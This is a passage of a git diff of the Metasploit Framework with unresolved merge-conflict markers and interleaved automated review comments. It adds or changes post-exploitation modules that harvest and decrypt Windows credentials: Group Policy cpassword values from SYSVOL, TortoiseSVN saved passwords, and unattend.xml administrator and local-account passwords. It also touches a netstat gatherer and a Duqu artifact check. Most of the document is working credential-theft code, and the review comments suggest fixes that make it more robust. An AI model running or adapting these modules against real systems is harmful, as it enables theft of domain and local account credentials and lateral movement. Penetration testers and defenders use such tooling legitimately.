+ task_path = "MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"
+ task_path_user = "USER\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"
+
+ domains = []
+ dcs = []
+ basepaths = []
+ fullpaths = []
+ @enumed_domains = []
+
+ print_status "Checking locally.."
+ locals = get_basepaths(client.fs.file.expand_path("%SYSTEMROOT%\\SYSVOL\\sysvol"))
+ unless locals.blank?
+ basepaths << locals
+ print_good "Policy Sahres found locally"
+ end
+
+ if datastore['ALL'] and datastore['DOMAINS'].blank?
+ domains = enum_domains
+ domains.reject!{|n| n == "WORKGROUP"}
+ end
+
+ datastore['DOMAINS'].split('').each{|ud| domains << ud} if datastore['DOMAINS']
+ domains << get_domain_reg
+ domains.flatten!
+ domains.compact!
+ domains.uniq!
+
+
+ domains.each do |domain|
+ dcs = enum_dcs(domain)
+ next if dcs.blank?
+ dcs.uniq!
+ tbase = []
+ dcs.each do |dc|
+ print_status "Searching for Policy Share on #{dc}..."
+ tbase = get_basepaths("\\\\#{dc}\\SYSVOL")
+ #If we got a basepath from the DC we know that we can reach it
+ #All DCs on the same domain should be the same so we only need one
+ unless tbase.blank?
+ print_good "Found Policy Share on #{dc}"
+ basepaths << tbase
+ break
+ end
+ end
+ end
+
+ basepaths.flatten!
+ basepaths.compact!
+ print_status "Searching for Group Policy XML Files..."
+ basepaths.each do |policy_path|
+ fullpaths << find_path(policy_path, group_path)
+ fullpaths << find_path(policy_path, group_path_user)
+ fullpaths << find_path(policy_path, service_path)
+ fullpaths << find_path(policy_path, printer_path)
+ fullpaths << find_path(policy_path, drive_path)
+ fullpaths << find_path(policy_path, datasource_path)
+ fullpaths << find_path(policy_path, datasource_path_user)
+ fullpaths << find_path(policy_path, task_path)
+ fullpaths << find_path(policy_path, task_path_user)
+ end
+ fullpaths.flatten!
+ fullpaths.compact!
+ fullpaths.each do |filepath|
+ tmpfile = gpp_xml_file(filepath)
+ parse_xml(tmpfile) if tmpfile
+ end
+
+ end
+
+ def get_basepaths(base)
+ locals = []
+ begin
+ session.fs.dir.foreach(base) do |sub|
+ next if sub =~ /^(\.|\.\.)$/
+ tpath = "#{base}\\#{sub}\\Policies"
+ begin
+ session.fs.dir.foreach(tpath) do |sub2|
+ next if sub =~ /^(\.|\.\.)$/
+ locals << "#{tpath}\\#{sub2}\\"
+ end
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Could not access #{tpath} : #{e.message}"
+ end
+ end
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Error accessing #{base} : #{e.message}"
+ end
+ return locals
+ end
+
+
+>>>>>>> upstream/master
def find_path(path, xml_path)
xml_path = "#{path}\\#{xml_path}"
begin
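Review bot: `datastore['DOMAINS'].split('')` in the added `run` splits the option into single characters, while the option text describes a space-separated list, so each letter would be queued as a domain. It should be `datastore['DOMAINS'].split(' ')`. In `get_basepaths` the inner loop tests the outer variable, `next if sub =~ /^(\.|\.\.)$/`, so `.` and `..` entries under `Policies` are not skipped; that line should test `sub2`. The status string `"Policy Sahres found locally"` also has a typo. `find_path` at the end of the hunk continues outside it.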
@@ -200,13 +325,18 @@ class Metasploit3 < Msf::Post
end
end
+<<<<<<< HEAD
def get_xml(path)
+=======
+ def gpp_xml_file(path)
+>>>>>>> upstream/master
begin
groups = client.fs.file.new(path,'r')
until groups.eof
data = groups.read
end
+<<<<<<< HEAD
domain = path.split('\\')[2]
mxml = REXML::Document.new(data).root
@@ -334,6 +464,75 @@ class Metasploit3 < Msf::Post
end
end
+=======
+ spath = path.split('\\')
+ retobj = {
+ :dc => spath[2],
+ :path => path,
+ :xml => REXML::Document.new(data).root
+ }
+ if spath[4] == "sysvol"
+ retobj[:domain] = spath[5]
+ else
+ retobj[:domain] = spath[4]
+ end
+ return retobj
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Received error code #{e.code} when reading #{path}"
+ return nil
+ end
+ end
+
+ def parse_xml(xmlfile)
+ mxml = xmlfile[:xml]
+ print_status "Parsing file: #{xmlfile[:path]} ..."
+ mxml.elements.to_a("//Properties").each do |node|
+ epassword = node.attributes['cpassword']
+ next if epassword.to_s.empty?
+ next if @enumed_domains.include? xmlfile[:domain]
+ @enumed_domains << xmlfile[:domain]
+ pass = decrypt(epassword)
+
+ user = node.attributes['runAs'] if node.attributes['runAs']
+ user = node.attributes['accountName'] if node.attributes['accountName']
+ user = node.attributes['username'] if node.attributes['username']
+ user = node.attributes['userName'] if node.attributes['userName']
+ user = node.attributes['newName'] unless node.attributes['newName'].blank?
+ changed = node.parent.attributes['changed']
+
+ expires = node.attributes['expires']
+ never_expires = node.attributes['neverExpires']
+ disabled = node.attributes['acctDisabled']
+
+
+ table = Rex::Ui::Text::Table.new(
+ 'Header' => 'Group Policy Credential Info',
+ 'Indent' => 1,
+ 'SortIndex' => 5,
+ 'Columns' =>
+ [
+ 'Name',
+ 'Value',
+ ]
+ )
+
+ table << ["USERNAME", user ]
+ table << ["PASSWORD", pass]
+ table << ["DOMAIN CONTROLLER", xmlfile[:dc]]
+ table << ["DOMAIN", xmlfile[:domain] ]
+ table << ["CHANGED", changed]
+ table << ["EXPIRES", expires] unless expires.blank?
+ table << ["NEVER_EXPIRES?", never_expires] unless never_expires.blank?
+ table << ["DISABLED", disabled] unless disabled.blank?
+
+
+ print_good table.to_s
+ report_creds(user,pass) unless disabled and disabled == '1'
+ end
+ end
+
+
+>>>>>>> upstream/master
def report_creds(user, pass)
if session.db_record
source_id = session.db_record.id
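Review bot: The added tail of `gpp_xml_file` returns `retobj` (or `nil` from the rescue) without closing the remote file handle opened as `groups` in the lines above this hunk, and no `close` is visible on the new side. Since `run` calls this once per discovered XML path, an `ensure` with `groups.close if groups` would release each handle. In `parse_xml`, `user` stays `nil` when none of the five attributes is present and is still passed to `report_creds(user,pass)`. A guard such as `next if user.nil?` before the table is built, or an explicit placeholder, would avoid storing a credential with no account name. `report_creds` continues outside the hunk.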
@@ -368,7 +567,11 @@ class Metasploit3 < Msf::Post
return pass
end
+<<<<<<< HEAD
#enum_domains.rb
+=======
+
+>>>>>>> upstream/master
def enum_domains
print_status "Enumerating Domains on the Network..."
domain_enum = 0x80000000 # SV_TYPE_DOMAIN_ENUM
@@ -405,14 +608,21 @@ class Metasploit3 < Msf::Post
x[:platform] = mem[(base + 0),4].unpack("V*")[0]
nameptr = mem[(base + 4),4].unpack("V*")[0]
x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join
+<<<<<<< HEAD
domains << x
+=======
+ domains << x[:domain]
+>>>>>>> upstream/master
base = base + 8
end
return domains
end
+<<<<<<< HEAD
#enum_domains.rb
+=======
+>>>>>>> upstream/master
def enum_dcs(domain)
print_status("Enumerating DCs for #{domain}")
domaincontrollers = 24 # 10 + 8 (SV_TYPE_DOMAIN_BAKCTRL || SV_TYPE_DOMAIN_CTRL)
@@ -423,7 +633,11 @@ class Metasploit3 < Msf::Post
result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,domain,nil)
end
if result['totalentries'] == 0
+<<<<<<< HEAD
print_error "No Domain Controllers found for #{domain}"
+=======
+ print_error("No Domain Controllers found for #{domain}")
+>>>>>>> upstream/master
return nil
end
@@ -433,7 +647,11 @@ class Metasploit3 < Msf::Post
base = 0
mem = client.railgun.memread(startmem, 8*count)
hostnames = []
+<<<<<<< HEAD
count.times do |i|
+=======
+ count.times{|i|
+>>>>>>> upstream/master
t = {}
t[:platform] = mem[(base + 0),4].unpack("V*")[0]
nameptr = mem[(base + 4),4].unpack("V*")[0]
@@ -441,6 +659,7 @@ class Metasploit3 < Msf::Post
base = base + 8
print_good "DC Found: #{t[:dc_hostname]}"
hostnames << t[:dc_hostname]
+<<<<<<< HEAD
end
return hostnames
@@ -482,3 +701,24 @@ class Metasploit3 < Msf::Post
end
end
+=======
+ }
+ return hostnames
+ end
+
+ def get_domain_reg
+ begin
+ subkey = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\"
+ v_name = "Domain"
+ domain = registry_getvaldata(subkey, v_name)
+ print_status "Retrieved domain #{domain} from registry "
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Received error code #{e.code} - #{e.message} when reading the registry."
+ end
+ domain = domain.split('.')[0].upcase
+
+ return domain
+ end
+
+end
+>>>>>>> upstream/master
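Review bot: `get_domain_reg` dereferences `domain` after the rescue, so when `registry_getvaldata` raises `RequestError` (or, presumably, returns `nil` for a host that is not domain-joined) the line `domain.split('.')[0].upcase` raises `NoMethodError` and aborts `run`. Returning early keeps the caller's `domains.compact!` meaningful: add `return nil` inside the rescue and `return nil if domain.blank?` before the split. The status line also prints before the value is known to be usable.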
diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb
new file mode 100644
index 0000000000..c53ef63edc
--- /dev/null
+++ b/modules/post/windows/gather/credentials/tortoisesvn.rb
@@ -0,0 +1,211 @@
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'base64'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Registry
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Gather TortoiseSVN Saved Password Extraction',
+ 'Description' => %q{
+ This module extracts and decrypts saved TortoiseSVN passwords. In
+ order for decryption to be successful this module must be executed
+ under the same privileges as the user which originally encrypted the
+ password.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Justin Cacak'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+ end
+
+ def prepare_railgun
+ rg = session.railgun
+ if (!rg.get_dll('crypt32'))
+ rg.add_dll('crypt32')
+ end
+ end
+
+ def decrypt_password(data)
+ rg = session.railgun
+ pid = client.sys.process.getpid
+ process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+
+ mem = process.memory.allocate(128)
+ process.memory.write(mem, data)
+
+ if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
+ addr = [mem].pack("V")
+ len = [data.length].pack("V")
+ ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
+ #print_status("#{ret.inspect}")
+ len, addr = ret["pDataOut"].unpack("V2")
+ else
+ addr = [mem].pack("Q")
+ len = [data.length].pack("Q")
+ ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
+ len, addr = ret["pDataOut"].unpack("Q2")
+ end
+
+ return "" if len == 0
+ decrypted_pw = process.memory.read(addr, len)
+ return decrypted_pw
+ end
+
+ def get_proxy_data
+ # Check if user proxy setting are utilized
+ @key_base = "HKCU\\Software\\TortoiseSVN\\Servers\\global\\"
+ http_proxy_password = registry_getvaldata("#{@key_base}", 'http-proxy-password')
+
+ if http_proxy_password == nil
+ return
+ else
+ # A proxy with password is utilized, gather details
+ print_good("HTTP Proxy Settings")
+ http_proxy_username= registry_getvaldata("#{@key_base}", 'http-proxy-username')
+ http_proxy_host = registry_getvaldata("#{@key_base}", 'http-proxy-host')
+ http_proxy_port = registry_getvaldata("#{@key_base}", 'http-proxy-port')
+
+ # Output results to screen
+ print_status(" Host: #{http_proxy_host}")
+ print_status(" Port: #{http_proxy_port}")
+ print_status(" Username: #{http_proxy_username}")
+ print_status(" Password: #{http_proxy_password}")
+ print_status("")
+ end
+
+ # Report proxy creds
+ if session.db_record
+ source_id = session.db_record.id
+ else
+ source_id = nil
+ end
+ report_auth_info(
+ :host => Rex::Socket.resolv(http_proxy_host), # TODO: Fix up report_host?
+ :port => http_proxy_port,
+ :sname => "http",
+ :source_id => source_id,
+ :source_type => "exploit",
+ :user => http_proxy_username,
+ :pass => http_proxy_password)
+ end
+
+ def get_config_files
+ # Determine if TortoiseSVN is installed and parse config files
+ savedpwds = 0
+ user_appdata = session.fs.file.expand_path("%APPDATA%")
+ path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
+ print_status("Checking for configuration files in: #{path}")
+
+ begin
+ session.fs.dir.foreach(path) do |file_name|
+ next if file_name == "." or file_name == ".."
+ savedpwds = analyze_file(path+file_name)
+ end
+ rescue => e
+ print_error "Exception raised: #{e.message}"
+ print_status("No configuration files located: TortoiseSVN may not be installed or configured.")
+ return
+ end
+
+ if savedpwds == 0
+ print_status("No configuration files located")
+ end
+
+ end
+
+ def analyze_file(filename)
+ config = client.fs.file.new(filename, 'r')
+ contents = config.read
+ config_lines = contents.split("\n")
+
+ print_good("Account Found:")
+ line_num = 0
+
+ for line in config_lines
+ line.chomp
+ line_num += 1
+ if line_num == 8
+ enc_password = Base64.decode64(line)
+ password = decrypt_password(enc_password)
+ elsif line_num == 12
+ if line.match(/<(.*)>.(.*)/)
+ # Parse for output
+ url = $1
+ realm = $2
+ realm.gsub! "\r", "" #Remove \r (not common)
+ if line.match(/<(.*):\/\/(.*):(.*)>/)
+ # Parse for reporting
+ sname = $1
+ host = $2
+ portnum = $3
+ portnum.gsub! "\r", "" #Remove \r (not common)
+ end
+ else
+ url = ""
+ end
+ elsif line_num == 16
+ user_name = line
+ user_name.gsub! "\r", "" #Remove \r (not common)
+ end
+ end
+ config.close
+
+ #Handle null values or errors
+ if user_name == nil
+ user_name = ""
+ end
+
+ # Output results to screen
+ print_status(" URL: #{url}")
+ print_status(" Realm: #{realm}")
+ print_status(" User Name: #{user_name}")
+ print_status(" Password: #{password}")
+ print_status("")
+
+ # Report
+ if session.db_record
+ source_id = session.db_record.id
+ else
+ source_id = nil
+ end
+ report_auth_info(
+ :host => ::Rex::Socket.resolv_to_dotted(host), # XXX: Workaround for unresolved hostnames
+ :port => portnum,
+ :sname => sname,
+ :source_id => source_id,
+ :source_type => "exploit",
+ :user => user_name,
+ :pass => password)
+ print_debug "Should have reported..."
+
+ # Set savedpwds to 1 on return
+ return 1
+ end
+
+ def run
+ # Get uid. Decryption will only work if executed under the same user account as the password was encrypted.
+ uid = session.sys.config.getuid
+
+ if is_system?
+ print_error("This module is running under #{uid}.")
+ print_error("Automatic decryption will not be possible.")
+ print_error("Manually migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
+ else
+ print_status("Searching for TortoiseSVN...")
+ prepare_railgun
+ get_config_files()
+ get_proxy_data()
+ end
+
+ print_status("Complete")
+ end
+
+end
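Review bot: `decrypt_password` writes `data` into a fixed allocation, `process.memory.allocate(128)`, without checking `data.length`, so a longer decoded blob from a config file may be written past the region that was requested. The buffer should be sized from the input, `mem = process.memory.allocate(data.length)`. Neither that allocation nor the handle from `process.open` is released afterwards. In `analyze_file`, `line.chomp` discards its result, and `host`, `portnum` and `sname` remain `nil` when the second regex does not match, yet they are still passed to `resolv_to_dotted(host)` and `report_auth_info`. `config.close` is also skipped if anything in the loop raises. The leftover `print_debug "Should have reported..."` should be removed. Both `report_auth_info` calls label a post module's findings with `:source_type => "exploit"`, which is worth confirming.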
diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb
index 0bd860f59d..a348eb58ba 100644
--- a/modules/post/windows/gather/enum_files.rb
+++ b/modules/post/windows/gather/enum_files.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
-
+
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Generic File Collection',
@@ -58,9 +58,9 @@ class Metasploit3 < Msf::Post
def download_files(location, file_type)
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
- sysnfo = client.sys.config.sysinfo['OS']
+ sysnfo = client.sys.config.sysinfo['OS']
profile_path_old = sysdriv + "\\Documents and Settings\\"
- profile_path_new = sysdriv + "\\Users\\"
+ profile_path_new = sysdriv + "\\Users\\"
if location
print_status("Searching #{location}")
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Post
elsif sysnfo =~/(Windows XP|2003|.NET)/
print_status("Searching #{profile_path_old} through windows user profile structure")
getfile = client.fs.file.search(profile_path_old,file_type,recurse=true,timeout=-1)
- else
+ else
# For systems such as: Windows 7|Windows Vista|2008
print_status("Searching #{profile_path_new} through windows user profile structure")
getfile = client.fs.file.search(profile_path_new,file_type,recurse=true,timeout=-1)
diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb
new file mode 100644
index 0000000000..e588ffe5f6
--- /dev/null
+++ b/modules/post/windows/gather/enum_unattend.rb
@@ -0,0 +1,201 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/post/file'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Gather Unattended Answer File (unattend.xml) Enumeration',
+ 'Description' => %q{
+ This module will check the file system for a copy of
+ unattend.xml then extract sensitive information such as username
+ and decoded passwords.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Sean Verity ',
+ 'sinn3r'
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://technet.microsoft.com/en-us/library/ff715801']
+ ],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+ end
+
+
+ #
+ # Determie if unattend.xml exists or not
+ #
+ def unattend_exists?(xml_path)
+ x = session.fs.file.stat(xml_path) rescue nil
+ return !x.nil?
+ end
+
+
+ #
+ # Read the raw content of unattend.xml
+ #
+ def load_unattend(xml_path)
+ print_status("Reading #{xml_path}")
+ f = session.fs.file.new(xml_path)
+ buf = ""
+ until f.eof?
+ buf << f.read
+ end
+
+ return buf
+ end
+
+
+ #
+ # Extract all the interesting information from unattend.xml,
+ # and return an array or tables
+ #
+ def extract_creds(f)
+ begin
+ xml = REXML::Document.new(f)
+ rescue REXML::ParseException => e
+ print_error("Invalid XML format")
+ vprint_line(e.message)
+ return []
+ end
+ base_node = 'unattend/settings/component/UserAccounts'
+ user_accounts = xml.elements[base_node]
+
+ # If there's no UsersAccounts, then there's no point to continue
+ if user_accounts.nil?
+ print_error("No UserAccounts node found")
+ return []
+ end
+
+ cred_tables = []
+ account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts']
+ account_types.each do |t|
+ node = user_accounts.elements[t]
+ next if node.nil?
+
+ case t
+ #
+ # Extract the password from AdministratorPasswords
+ #
+ when account_types[0]
+ table = Rex::Ui::Text::Table.new({
+ 'Header' => 'AdministratorPasswords',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Password']
+ })
+
+ password = Rex::Text.decode_base64(node.elements['Value'].get_text) rescue ''
+ password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '')
+ if not password.empty?
+ table << ['Administrator', password]
+ cred_tables << table
+ end
+
+ #
+ # Extract the sensitive data from DomainAccounts.
+ # According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts
+ #
+ when account_types[1] #DomainAccounts
+ table = Rex::Ui::Text::Table.new({
+ 'Header' => 'DomainAccounts',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Group']
+ })
+
+ node.elements.each do |account_list|
+ name = account_list.elements['DomainAccount/Name'].get_text rescue ''
+ group = account_list.elements['DomainAccount/Group'].get_text rescue ''
+
+ table << [name, group]
+ end
+
+ cred_tables << table if not table.rows.empty?
+
+ #
+ # Extract the username/password from LocalAccounts
+ #
+ when account_types[2] #LocalAccounts
+ table = Rex::Ui::Text::Table.new({
+ 'Header' => 'LocalAccounts',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Password']
+ })
+
+ node.elements.each do |local|
+ password = Rex::Text.decode_base64(local.elements['Password/Value'].get_text) rescue ''
+ password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
+ username = local.elements['Name'].get_text rescue ''
+ table << [username, password]
+ end
+
+ cred_tables << table if not table.rows.empty?
+ end
+ end
+
+ return cred_tables
+ end
+
+
+ #
+ # Save Rex tables separately
+ #
+ def save_cred_tables(cred_tables)
+ cred_tables.each do |t|
+ vprint_line("\n#{t.to_s}\n")
+ p = store_loot('windows.unattended.creds', 'text/csv', session, t.to_csv)
+ print_status("#{t.header} saved as: #{p}")
+ end
+ end
+
+
+ #
+ # Save the raw version of unattend.xml
+ #
+ def save_raw(data)
+ store_loot('windows.unattended.raw', 'text/plain', session, data)
+ end
+
+
+ def run
+ drive = session.fs.file.expand_path("%SystemDrive%")
+ xml_path = "#{drive}\\Windows\\System32\\sysprep\\unattend.xml"
+
+ # If unattend.xml doesn't exist, no point to continue
+ if not unattend_exists?(xml_path)
+ print_error("#{xml_path} not found")
+ return
+ end
+
+ # If unattend.xml is actually empty, no point to continue, either.
+ f = load_unattend(xml_path)
+ if f.empty?
+ print_error("#{xml_path} is empty")
+ return
+ end
+
+ # Save the raw version in case the user wants more information
+ p = save_raw(f)
+ print_status("Raw version of unattend.xml saved as: #{p}")
+
+ # Extract the credentials
+ cred_tables = extract_creds(f)
+
+ # Save the data
+ save_cred_tables(cred_tables)
+ end
+end
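Review bot: `load_unattend` opens the remote file with `session.fs.file.new(xml_path)` and never closes it, and a read error part-way through would propagate out of `run` with the handle still open. Wrapping the read in `begin ... ensure f.close if f end` fixes both. In `extract_creds` the inline `rescue ''` modifiers hide every error from `decode_base64` and `get_text`, so a malformed entry is indistinguishable from an empty password. In the `LocalAccounts` branch a row is added even when both fields came back empty. The trailing-marker regexes use `$`, which also matches before a final newline; `\z` states the intent exactly. Since the raw file is stored with `store_loot` before parsing, note that this loot holds the same secrets as the parsed tables and needs the same handling.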
diff --git a/modules/post/windows/gather/forensics/duqu_check.rb b/modules/post/windows/gather/forensics/duqu_check.rb
index c7de2d5fdf..1f42032bf2 100644
--- a/modules/post/windows/gather/forensics/duqu_check.rb
+++ b/modules/post/windows/gather/forensics/duqu_check.rb
@@ -7,6 +7,7 @@
require 'msf/core'
require 'msf/core/post/common'
+require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
@@ -55,11 +56,11 @@ class Metasploit3 < Msf::Post
match += 1
report_vuln(
:host => session.session_host,
- :name => self.fullname,
- :info => "#{path}\\#{query} possible CVE-2011-3402 exploitation [Duqu] artifact.",
+ :name => self.name,
+ :info => "Module #{self.fullname} detected #{path}\\#{query} - possible CVE-2011-3402 exploitation [Duqu] artifact.",
:refs => self.references,
- :exploited_at => Time.now.utc
- )
+ :exploited_at => Time.now.utc,
+ )
end
end
rescue # Probably should do something here...
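Review bot: `:exploited_at => Time.now.utc` on the re-added line stores the time this check ran, not the time the host was compromised, so a reader of the vuln record could take the scan time for the intrusion time. How `report_vuln` uses that key is not visible here; if it is kept, a comment such as `# time the artifact was detected, not the time of compromise` would prevent misreading during an investigation. The new trailing comma before `)` is a style oddity and can be dropped. The enclosing loop and `begin` start outside this hunk, and the bare `rescue` that closes it means a failed registry query looks the same as "no artifact found".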
diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb
new file mode 100644
index 0000000000..fb1eb38967
--- /dev/null
+++ b/modules/post/windows/gather/tcpnetstat.rb
@@ -0,0 +1,107 @@
+##
+# $Id$
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Auxiliary::Report
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Gather TCP Netstat',
+ 'Description' => %q{ This Module lists current TCP sessions},
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Rob Fuller '],
+ 'Version' => '$Revision$',
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter']
+ ))
+ register_options(
+ [
+ ], self.class)
+ end
+
+ def parse_tcptable(buffer)
+ entries = buffer[0,4].unpack("V*")[0]
+ print_status("Total TCP Entries: #{entries}")
+
+ rtable = Rex::Ui::Text::Table.new(
+ 'Header' => 'Routing Table',
+ 'Indent' => 2,
+ 'Columns' => ['STATE', 'LHOST', 'LPORT', 'RHOST', 'RPORT']
+ )
+ offset = 4
+ (1..entries).each do
+ x = {}
+ x[:state] = case buffer[(offset + 0), 4].unpack("V*")[0]
+ when 1
+ 'CLOSED'
+ when 2
+ 'LISTEN'
+ when 3
+ 'SYN_SENT'
+ when 4
+ 'SYN_RCVD'
+ when 5
+ 'ESTABLISHED'
+ when 6
+ 'FIN_WAIT1'
+ when 7
+ 'FIN_WAIT2'
+ when 8
+ 'CLOSE_WAIT'
+ when 9
+ 'CLOSING'
+ when 10
+ 'LAST_ACK'
+ when 11
+ 'TIME_WAIT'
+ when 12
+ 'DELETE_TCB'
+ else
+ 'UNDEFINED'
+ end
+ x[:lhost] = Rex::Socket.addr_itoa(buffer[(offset + 4), 4].unpack("N")[0])
+ x[:lport] = buffer[(offset + 8), 4].unpack("n")[0]
+ x[:rhost] = Rex::Socket.addr_itoa(buffer[(offset + 12), 4].unpack("N")[0])
+ if x[:state] == "LISTEN"
+ x[:rport] = "_"
+ else
+ x[:rport] = buffer[(offset + 16), 4].unpack("n")[0]
+ end
+ offset = offset + 20
+ rtable << [x[:state], x[:lhost], x[:lport], x[:rhost], x[:rport]]
+ end
+ print_status(rtable.to_s)
+ end
+
+ def run
+ session.railgun.add_function('iphlpapi', 'GetTcpTable', 'DWORD', [
+ ['PBLOB', 'pTcpTable', 'out'],
+ ['PDWORD', 'pdwSize', 'inout'],
+ ['BOOL', 'bOrder', 'in']
+ ])
+
+ getsize = session.railgun.iphlpapi.GetTcpTable(4,4,true)
+ buffersize = getsize['pdwSize']
+
+ print_status("TCP Table Size: #{buffersize}")
+ tcptable = session.railgun.iphlpapi.GetTcpTable(buffersize,buffersize,true)
+
+ parse_tcptable(tcptable['pTcpTable'])
+ end
+end
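Review bot: `run` never checks the result of the second `GetTcpTable` call, and `parse_tcptable` trusts the entry count in the first four bytes without comparing it to the buffer length. If the call fails, or the table grows between the size query and the fetch, a slice such as `buffer[(offset + 0), 4]` comes back nil and `.unpack` raises, so the module aborts with a stack trace instead of a clear error. Checking the API return code and clamping `entries` to the rows that actually fit avoids that, as sketched below. Separately, the table header reads `'Routing Table'` although the rows are TCP connections, and the output is only printed even though `Msf::Auxiliary::Report` is included, so nothing is kept for later review.

```ruby
def parse_tcptable(buffer)
  if buffer.nil? or buffer.length < 4
    print_error("GetTcpTable returned no table data")
    return
  end
  entries = buffer[0,4].unpack("V*")[0]
  # Each row read below is 20 bytes; never walk past the data actually returned.
  available = (buffer.length - 4) / 20
  if entries > available
    print_error("Header claims #{entries} entries but only #{available} fit in the buffer")
    entries = available
  end
  # … unchanged: table setup and per-entry loop …

def run
  # … unchanged: add_function and the size query …
  tcptable = session.railgun.iphlpapi.GetTcpTable(buffersize,buffersize,true)
  if tcptable['return'] != 0
    print_error("GetTcpTable failed with error #{tcptable['return']}")
    return
  end
  parse_tcptable(tcptable['pTcpTable'])
```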
diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb
index 61c5a08ec4..53141daa21 100644
--- a/modules/post/windows/manage/remove_ca.rb
+++ b/modules/post/windows/manage/remove_ca.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
- 'Name' => 'Windows Certificate Authority Removal',
+ 'Name' => 'Windows Manage Certificate Authority Removal',
'Description' => %q{
This module allows the attacker to remove an arbitrary CA certificate
from the victim's Trusted Root store.},
diff --git a/msfbinscan b/msfbinscan
index c36f172e29..442bf3e7f4 100755
--- a/msfbinscan
+++ b/msfbinscan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfcli b/msfcli
index 04ce300ea7..c220b83a07 100755
--- a/msfcli
+++ b/msfcli
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfconsole b/msfconsole
index 95adf9efea..c21594147f 100755
--- a/msfconsole
+++ b/msfconsole
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
@@ -34,7 +35,9 @@ class OptsConsole
# Return a hash describing the options.
#
def self.parse(args)
- options = {}
+ options = {
+ 'DeferModuleLoads' => true
+ }
opts = OptionParser.new do |opts|
opts.banner = "Usage: msfconsole [options]"
diff --git a/msfd b/msfd
index b7b2b7eff7..411a134b04 100755
--- a/msfd
+++ b/msfd
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfelfscan b/msfelfscan
index 25ea61e695..b4714307bb 100755
--- a/msfelfscan
+++ b/msfelfscan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfencode b/msfencode
index 7a7f8d5cb3..a147a1209a 100755
--- a/msfencode
+++ b/msfencode
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfgui b/msfgui
index ae4d04571d..05b6d5e510 100755
--- a/msfgui
+++ b/msfgui
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfmachscan b/msfmachscan
